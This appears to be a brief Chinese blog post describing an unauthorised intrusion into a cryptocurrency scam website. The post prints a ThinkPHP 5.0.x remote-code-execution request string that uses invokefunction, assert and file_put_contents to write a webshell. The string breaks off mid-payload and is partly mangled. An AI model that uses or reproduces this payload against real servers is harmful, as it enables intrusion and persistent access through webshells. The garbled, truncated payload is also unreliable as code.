某殺豬盤滲透測試

最近偶然發現一個虛擬貨幣買漲跌的殺豬盤,遂進行了一波測試,前臺長這樣。 爲thinkphp5.0.5隨用RCE進行打入,成功寫入webshell。 s=index|think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][][email protected]_put_contents(base64_d
相關文章
相關標籤/搜索